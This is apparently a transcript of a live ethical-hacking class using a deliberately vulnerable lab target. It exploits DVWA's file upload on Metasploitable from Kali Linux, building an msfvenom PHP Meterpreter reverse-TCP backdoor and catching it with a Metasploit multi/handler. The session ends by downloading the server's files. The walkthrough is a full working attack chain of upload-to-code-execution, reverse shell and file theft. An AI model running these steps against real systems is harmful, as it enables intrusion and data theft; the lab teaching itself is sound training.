Kali Linux, Metasploitable Linux, turn it on. Log into Kali Linux, Kali and Kali username and password. Metasploitable Linux. What is the username and password? MSF admin and MSF admin. Launch DVWA. How to get cursor in Metasploit. So if you want to take control of the virtual machine, click on that screen in the virtual machine. If you want to come out of that, type Alt plus Control, right? What is the IP address of Metasploitable? One 154.130. Okay, that is DVWA. 154.130. Launch DVWA, login, ensure security is set to low. Okay. Right. As of now, security level is high. Select DVWA security, set it to low, submit. Then click on file upload. Here, try to upload one image file just like a normal user. Anyone can do it. So you logged in as an end user, uploading one image file which will be successful. But as a hacker or ethical hacker, you need to upload one HTML, right? Okay. Upload HTML, check whether it is working or not. Then upload one simple PHP file, check whether it gets uploaded or not. After that, check for the execution of HTML and execution of PHP. Once that is done, then we try to upload a backdoor file. We have to use a tool called MSF Venom, right? So we need to create PHP file, upload that, then exploit it to gain the session. So, okay. Try the vulnerability first. Check the vulnerability. If it exists, then we go for the exploitation. For exploitation, we use two tools. What are the two tools which we are going to use for exploitation? Reply in the chat window. In this case, for file uploads, we have to use two tools. One is Metasploit, okay, for exploitation purpose, which consists exploitation modules and payloads. What is the other tool? MSF Venom, okay. You want to create a payload, not payload, backdoor file that will help us to gain the session. MSF Venom and Metasploit tool. Remember the names. They will ask you like, what are the tools you have used for exploitation? You should not say like Burpsuit, Zap, Nmap. Exploitation tools are Metasploit is main tool, and MSF Venom is the tool used for creating the backdoor files. Fair enough. Try these three scenarios: image, HTML, and PHP. Then execute that. Confirm in the chat window. Okay. 4 minutes to go. PHP file, I'll show it. PHP, I'll show it. And if you have some issues with the DVWA, you can share the screen. I'm giving you the permissions. Other members, try for HTML first. HTML with few elements, image, then iframe, JavaScript alert. Try it out. Just hold on. I'll give permissions for screen sharing. Yeah, go ahead in case if you got stuck with respect to DVW application. Naveen. Yes, we are able to see your screen. Kali Linux is up, Metasploitable is up, and you are not able to launch DVW application. What is the IP address of Metasploit? Go to the Metasploitable DVWA. Wait. It will take some time. Click on the screen. Other members try it out, or else I'll show one more time. Looks like your Metasploitable is not up. Do one thing. Okay, hold on. Check the IP address. Give ifconfig. Enter. The IP address is 107.128, right? The second line after the ifconfig, you see the IP address of your system 107.128. Go back to Kali Linux 107.128. Okay, fair enough. It is going to work. Other members, any other doubts? You can go ahead from here. Okay. Still anyone facing with DVLA or network issue? Setup Kali Linux and Metasploitable Linux. No issues. Fine. So what I'm trying to do is first you upload normal file, normal image, just like the other users, end users will do. Try to select the image file. Go to the downloads. We don't have the images, no? Over the desktop, we have some images. Image 1, image 2, image 3, Spider-Man. Image img1, that is Spider-Man, JPEG file. Select that and upload. We see that the image successfully got uploaded. This is the first case, our first scenario. The second scenario, is you have to upload an HTML file. So how do you create HTML file? We discussed in first week. You need an editor in Kali Linux. How to launch an application in Kali Linux? Go to the menu or click on the dragon icon. Just like Notepad++, you can open editor in Kali Linux. Just search for editor, text editor. Launch that. There is no need to create a very big HTML page. Simple alert you can put. HTML starting tag and HTML ending tag. You need to create a simple HTML script. Give Java alert script ending tag of the script, then alert of 1 2 3. If you don't want to create a huge HTML script with lot of elements, you can go with simple JavaScript within this HTML tags. Only thing is you have to save with the extension of .html. Okay, I'll name it like sample2.html. I'm saving under curly folder. The moment you save with .html, you see the syntax got changed in this editor, text editor. The file is ready. It is saved under curly. Now go back to the application. As an end user, try to upload this HTML. It is under curly, right? Sample2.html. Okay, here it is. Select the file. The application is accepting .html files. This is a vulnerability. Okay, one of the vulnerability, and we are able to successfully upload. Copy the path. Once you confirm the root path, you have to give the exact path and then execute that specific script from the client itself. Enter. We are able to get the alert. Okay, which means that the application is vulnerable for file uploads. We are able to do the remote code execution. Okay, through this file upload functionality. Where is this file located? Sample2.html. It is there in the server, not in your local system. So, and it is a script. It can be a HTML script, PHP, or shell script, whatever it is. If you are executing a script in a remote system, we call it like remote code execution vulnerability. And if you want to try the same thing with PHP, what do? Go to the text editor. You can make use of the same script. That's not a problem. Only thing is, copy the script, create a new file. You need to save it as .html. PHP is a front-end application. If you want to create a website, even PHP technology also can be used. Some file. As of now, I didn't save it with any name, without any extension. Now I'm going to save it as a PHP. Sample2.php. Save it. It got saved. Why do you want to upload a PHP script? The reason is application is built with a PHP. That is the reason it can understand only PHP scripts for even for exploitation. Browse sample2.php. Upload. Successfully uploaded. Copy the path. Instead of HTML, just put PHP. That's it. We are able to execute even PHP. So far, whatever we have done, it is just a vulnerability checking. We are trying to check if the vulnerability exists or not. We haven't exploited yet. So practice this and confirm in the chat window. Once you are done, then I'll show you the exploitation part of it. We use Metasploit and MSF Venom for exploitation. How long do you guys need it? 8 now, 10, 15, 7 minutes. Okay. Everyone has to do this. Create a simple HTML script, create a simple PHP script, and then try for execution by putting the correct path in the URL. Tell me one more time. Try it out. If you get stuck, I'll explain it one more time. Gauri. Ankit, you can set up the lab and then follow some sessions. You'll be able to catch up within 3 or 4 sessions because each and every lab is an independent session. Okay. What the browser path? Text editor in Kali Linux, not the notepad. I'm going to repeat one more time from starting, like how we are doing the how we are checking for the vulnerability and how we are checking for the exploitation. I'm going to do it. Try it out before I do it one more time. Last 2 minutes. How many of you are done? Bobji, you want the Kali Linux link, right? We'll share it after the session. Vijay Kumar, Dan, Prashant, Rajshekhar, Bhavya, who else? Satish, Anita, Sai Ishwar, Naveen, Noblesh, Preeti, Chandrika, Jilan, Charat, Shiva, Raghavendra. The exploitation part, you need to know two tools. So, and then 4 minutes, take 4 minutes of time. How many of you are done with HTML? Shravan, Sangeeta, Rupesh, Jagadish. How many of you are done with HTML? Shukur, Sharat, Charat, Preeti. Try to finish the HTML first. Once again, explain HTML and PHP. Okay, last 1 minute. Image done, but explain HTML and PHP. Pratyusha done. Raghuram, Naresh, Suguna both. Renuka done. Amarnath, Sridhar, Prashant. Some issues with image. Try uploading multiple images. Don't get stuck with only one image. Try downloading .jpeg, .jpg. Okay. Or else if you are not able to upload image, directly go with HTML and PHP. Okay. Last 30 seconds. I'm going to explain one more time for your advantage. For job purpose and interview purpose, the exploitation is optional, but checking the vulnerability is important. Upload is there. Already we discussed in the previous session. Different kinds of applications where you upload the images or documents. All of you name one application where you would have seen file upload functionality. I would say Facebook. I try to upload images and videos. Give me one example of the application where you would have seen this kind of application. Instagram, okay? Insta, Twitter, WhatsApp. One example of the application from each one of you. Banking, Skype, Naukri, Snapchat, matrimony sites, Aadhaar card, Aadhaar website, government websites, insurance websites, Telugu matrimony, Snapchat, Google Drive, job portals, insurance portals, healthcare applications, KYC, ticket booking apps, online payments, DRDO. So there are a lot of applications where you would see the file upload functionality. I'm going to share a PDF document. It explains about the complete file upload functionality, exploitations, and the prevention mechanisms. So from now onwards, these documents will be only for paid members. Cyber security basics. No, not here. Anyhow, I'll be sharing the PDF document for your reference in case if you are not able to do it by going through the steps. Let me do one more time. So what I'm doing first, image is working, but HTML, PHP is not working. It should work. First create HTML script. You open HTML page. The syntax should be perfect. HTML, ending tag of the HTML, script, ending tag of script. You want to share the screen, Aparna? Anyone who wants to share the screen, if you are not able to do it? Okay, share it under 2 minutes. Today, anyhow, we are going to finish this exploitation part of it. You don't know how to share the screen. There will be an option in green color, share screen, like mute, start video, security, participants. There is an option, share screen. You should be able to share the screen. In case if you have any challenges, we'll take it offline, no issues. Anyone else? Any challenges in practicing this? Okay, let me do one more time, complete from end to end. Okay, then again you guys can try one more time. Very simple, just like the file upload functionality in any kind of application. In DBWA also we have a file upload functionality. As a normal user, what you do, you upload one image. Any kind of image, need not be like some specific image. I always upload images of Spider-Man because it works. That's it. Okay, this image didn't work. Image 3. Sometimes because of the size or resolution, it may not work. You have to select a different image. That's it. Okay. This one also didn't work. Then only image 1 is working. Maybe because of the size. Image 2 is 129 KB, 167 KB. Image 3. Image 1 is 11 KB. Open. Upload. This one successfully uploaded. You want to check whether it can be accessible or executed from client system. Copy this path, paste over the browser URL. That's it. Enter. We are able to launch this uploaded file. Next time I want to upload a HTML file. Launch the editor, go to the start menu, type edit, you'll be able to launch text editor. Okay, once you launch the text editor, you'll find a similar page. Here, just give only 2 elements, HTML and script, for your practice. We are checking whether the application accepts HTML or not. For that, one element is enough. No need to create multiple elements. Save it as .html file. Once you save it, you need to upload that HTML. Click on browse. Under Kali, I have the sample2.html. Click on open. Then upload. Sample2 got successfully uploaded. Copy the path. Paste it. Check whether it executes or not. Similarly, even for PHP. Only difference is you need to save it as a PHP file, not the HTML file. This is what I have done so far. Now we are going to try with Metasploit. Okay. Simple HTML script, if you upload, we are just evaluating whether it is executed or not. But if you create a PHP which can be exploited or where you want to gain the session. Session means you are able to establish the connection to the server, which is our server here, web server 130, that is Metasploitable Linux is a server. I want to gain session, that is Metapreter session, or the active connection between attacker system and Metasploitable Linux. For that, I make use of two tools. Those are Metasploit and MSF Venom. Okay, listen carefully. Later you guys can practice it. Launch launch terminal. How do you launch terminal? There is a black icon here. Either you can click on that. Yes, I'll do it. Fine. We are going to make use of two tools. Already you know how to make use of. One second, there was some existing session. I'll come out of it. We need to create a PHP file that can be used for exploitation. Basically, the backdoor file. The end user, someone has to execute that PHP script. For that, MSF Venom space payload. Payload, we need to mention php/meterpreter/reverse TCP. There are two types of connection. One is binded TCP and other one is reverse TCP. Reverse means, what do you say? Instead of directly approaching, it is coming in the opposite direction, reverse. So binded TCP, I try to establish the connection from my computer to target. The payload will, the traffic will get initiated from my system to victim system. Whereas in reverse TCP, the traffic will get initiated from victim system to attacker system. That is the difference between binded TCP and reverse TCP. Just remember those things for now. So I'm trying to mention the payload for the backdoor as php/meterpreter/reverse TCP. Lhost is equal to attacker IP address. What is the attacker IP address? How do you find the Kali Linux IP address? I'll open one more terminal. Sudo space ifconfig 154.128. That is a Kali Linux IP address. Very simple. What do you mean by IP address and different kinds of IP addresses? IPv4, IPv6, internal, external. This already we discussed. If you have missed the class, go through my video. Okay. Right now it is an internal IP address 154.128. So L host is the listening host. L stands for listening. I'm trying to listen in this port 154 in this host IP address. If someone accesses this IP address in the network or in the internet through the port, I'll put like earlier I have used 5566 now. Now I try to make use of 55 and some other port number I'll put 88. I need to mention the format, raw format, raw in the sense whatever is the kind of payload we are trying to create with extension, the same extension it will get created. -f raw format, lhost is done, lport is done, then -o. You need to mention the path where exactly you want to store this backdoor file. You can mention home/kali/desktop/ give some name, the exploit backdoor, exploit file. We need the extension with PHP, right? Over the desktop, I'm trying to save it. Okay. Hyphen F. F stands for format. What is the kind of format you want to store? Hyphen O stands for output file. Where do you want to store the output file? That is the meaning of hyphen F and hyphen O. So for this tool, MSF Enum, these are the commands which you have to remember. That's it. You are done with this tool. Hardly 3 or 4 commands which you have to remember. Okay. Is it capital O or small O? Anyone? If you give MSF Enum help, you will be able to list. Reverse TCP means the connection gets established from the victim system. So there are 2 ways of opening the door. You knock the door. No. First you go break the door and open it and enter into the house or enter into the bank. The other way is you go to near to the door. Someone else will open from the inside. That is the reverse TCP. Got it? Let me try with small o. If it doesn't work, then I'll move to the capital O. I guess it should be capital O, hyphen capital O. Then enter. No. Small o it is. Enter. The backdoor file will get ready. Exploit file.php should get created. Has it created? Yes. It is saved under home Kali desktop. So I have saved it over the desktop. If you want to check it, the present working directory is what? If you want to check present working directory, pwd. Now we are at home Kali. Now change directory, cd space capital D tab. You need to use D tab. It will list you that. Again type ls list of files. Our file is ready. Exploit file.php. If you want to see that, very simple. Go to the editor file. I can open the file over the desktop. File, click on open. Where we have saved it over the desktop. Go to the desktop, exploit file.php, open, and has it come with same IP address and port number which we have configured? You see that L host has been reflecting here. L port 5588 is getting reflected. How about the other code? Don't worry about this. This piece of code will vary for each and every backdoor file. We are more concentrated towards IP address and port number. Okay. The exploitation file is ready. Now, what should we do? We have to run the exploitation job as well by using Metasploit. For Metasploit also, again, we have to make use of terminal. Go to the terminal. I can make use of Metasploitable tool, Metasploit. Metasploit tool depends on one of the service called PostgreSQL, and you need to mention like service name start. The service name is PostgreSQL space start. Enter. Once this service gets started, give the password. Then you need to start the Metasploit framework. What is the command to start the Metasploit framework? There are 2 commands. Do you remember how do we start Metasploit framework from terminal? $15 seconds to answer this question. 10 more. I want to start a tool called Metasploit, and I have given one command, very simple command, that is MSF console. What do you mean by MSF console? Metasploit framework console. Very simple. The commands will be there in the name of the tool itself. Very easy to remember. Remember 5 to 6 parameters or 6 arguments will be there for each tool. That's it. You are familiar with that tool. Either you can give MSF console or you can give MSF console -q. -q means quiet mode. Let us run in normal mode. Enter. Starting Metasploit framework console. Tomorrow's session will have a quiz based on the vulnerabilities you have learned. Get prepared and come. MSF 6, Metasploit framework version 6. Now, I make use of an exploitation module. Out of these 2099 modules, one module exists which can be used for Babji will be sharing that link. Hold on, okay. Use space multi/handler. This specific exploitation module can be used for a lot of exploitations. Enter multi/handler. As of now, it is configured with general shell reverse TCP, but we want PHP payload. Type show space options. Module options, nothing is there, but we need to set payload options. By default, it is going to generic shell reverse TCP, but we created a different payload, right? By using MSF enum, set space. If you want to see the list of payloads that is supported for this exploitation module, type show space payloads. Enter. LOADS. These are the payloads that are being supported for that. How many payloads are there total? 549 payloads are there for multi-handler exploitation module. If you are trying to hack Windows system, you have to select Windows exploitation module, Windows payload. If you want to hack or exploit within Windows some other software related ones, you can select that. Or if you want to go for some other payloads, some other systems, lot of exploitation modules are there. You can select based on that. However, I want to select the PHP payload. Let me see where exactly it is. It is in the alphabetical order. Python PH. PHP Meterpreter binded TCP. PHP Meterpreter bind TCP. But I want to select reverse TCP. Here it is. Select that payload. 272 is the number. Copy that selection. Now the command to give the payload is set space payload space payload name. Paste it. If you remember the payload, no need to search, directly you can give. Enter. Now again type show space options. We need to put lhost and lport. Set space lhost is the Kali Linux IP address. That is 192.168.154. What is the Kali Linux IP address? 154.128. Enter. Done. Set space lport space port number. Do you remember the port number what we have given in the backdoor file? 5588. So the same port number you have to give. Enter. Check whether it is updated or not. Type show space options. It got updated. Okay. We don't have any settings to set for the exploitation module. Only payload options we need to set. What is the next step? Exploit. That's it. Continuously, I'll be running this job and I'll be listening through this port. Continuously, I'll be listening through this port. Come back to the application. We know this application is vulnerable for file uploads. I created a backdoor file. I saved it over the desktop. exploit file.php, open, upload, successfully uploaded. Are you able to get the session? We are running the job, still we didn't get the session. What should we do next? What is the next step? We are successfully able to upload the file, but someone should click on that link, should execute that file. But the application itself is providing the option of executing that file from the client system. So as of now in the exploitation, we don't see any activity in the Metasploit. The moment you execute that file, you should be able to get the Meterpreter session. Copy this path, paste it over the browser. Root path is dvwa, and then continue with that path and enter. See the terminal, no activity as of now. Now go back and for that path enter. Now see what is happening in the Metasploit tool. We are able to gain the Meterpreter session. How do you confirm that? Read this sentence. Meterpreter session 1 opened from 128.5588 to 130.46781. 46781 is a random port that is getting opened in the target for giving us connection. Okay. How do you know that you have gained access to the target? Type sysinfo. It is showing the details of Metasploitable Linux. It is not showing the details of my Kali Linux, right? So we are able to gain the session. How about if you want to try some other commands? Just type help. You can try all these commands. Sysinfo, shell, or if your target supports playing some audio files, you should be able to play the audio file in the remote system by using this play command. You'll be able to get the list of processors and some standard operations also you can do. Background, if you want to background the session, you can background that session. Okay. What else we can try? Some of the easiest ones are download. You can download all the files to some location. List local files. List or print local working directory. Sysinfo list present working directory. Home Kali. How about PWD? Local means the Kali Linux. PWD means the remote system path. Okay. Then if you want to download any of the files from uploads, I want to download it to my local system. We have Meterpreter supports download command. Give the source file and destination file. Source file is var /ww /dvwa /hack hackable /uploads this folder. From this folder I want to copy to my local system. Local system is Kali Linux. /home /Kali /desktop / say like I want to create like okay Hari. I want all the files to be copied to Hari folder just because I'm able to get the remote session. Let us see. Enter. Downloading downloaded. So it would have downloaded to Hari all the files. Shall we check that? Here is the shortcut for opening the folders. Home Kali, open folder. I want to check in the desktop. Go to the desktop. Hari folder got created, and I would have downloaded all the files that are there in the server. See the list of files which were there in the servers. Sample1, sample2, test.php, some. This includes all the files from all different users. Just to confirm that this activity is post exploitation activity. Okay. This is how you have to perform. So what next? I'll give you the commands. Then you have to do it the same thing. Don't worry if you are not able to gain the session. Try to understand the concepts. Exploitation is just for your practice purpose. Okay. Let me provide you the commands now. Try it out. Do it for assignment. If you are not able to do it, tomorrow I'll explain it. Okay. History. You want these comments, right? From here, use multi-handler. You need the commands for Metasploit and you need the commands for MSF Winamp. Right now I'm posting it in the chat window. Later you guys take it from the shared drive as well. I'll share you all these commands. Then MSF Winamp. SQL map. No, this is not the one. MSF Winamp command. Is it clear? Any doubts, anyone? No, at least have you understood? Practice, you can do it. You can do it for assignment and you will try in the tomorrow's session, first 15 minutes. If I join late, try to practice this lab and ask any doubts to Urmila, Gayatri in any of the further sessions. Okay. We have left with 2 minutes. Is it good? Are you able to understand how we have done the exploitation? Practice, you can do it, at least the concept wise, how we have proceeded from step 1 to step 2 till complete exploitation. Other than reverse TCP, yes, you can use binded TCP also. Shell also you can use. We have different practical labs. Depending on the kind of lab, we'll do it. Try it out. I have given you the commands. If you're not able to do it for assignment. Once you are done, I want you to post this screenshot. Which screenshot you are going to post? Once you gain the session, you get the Meterpreter session, right? Session connected from so and so IP address to the target IP address. That screenshot you have to post. This is the assignment for tomorrow's session. Tomorrow we'll try with some more exploitations. See you tomorrow then. Thank you guys. Have a great day. Bye bye. One more time, drive access will be blocked from tomorrow for people who has not made the payment. So ensure that you clear your dues and payments by today evening.